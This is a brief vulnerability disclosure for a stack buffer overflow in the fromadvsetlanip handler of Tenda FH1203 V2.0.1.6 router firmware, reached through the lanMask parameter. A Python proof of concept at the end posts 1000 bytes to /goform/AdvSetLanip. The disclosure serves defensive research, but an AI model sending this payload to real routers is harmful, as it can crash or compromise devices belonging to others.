Tenda-FH1203-fromadvsetlanip

Overview

Firmware download website: https://www.tenda.com.cn/download/detail-2495.html

Affected version

FH1203 V2.0.1.6

Vulnerability details

The Tenda FH1203 V2.0.1.6 firmware has a buffer overflow vulnerability in the fromadvsetlanip function. The Var variable receives the lanMask parameter from a POST request and is later passed to the strcpy function. However, since the Since user can control the input of lanMask, the statemeant strcpy((char *)&a4[38 * a3 + 2] + 2, a1); can cause a buffer overflow.

POC

import requests

ip = "192.168.1.1"

url = f'http://{ip}/goform/AdvSetLanip'
payload = b'a' * 1000
data = {
    'lanMask':payload
}

requests.post(url, data=data)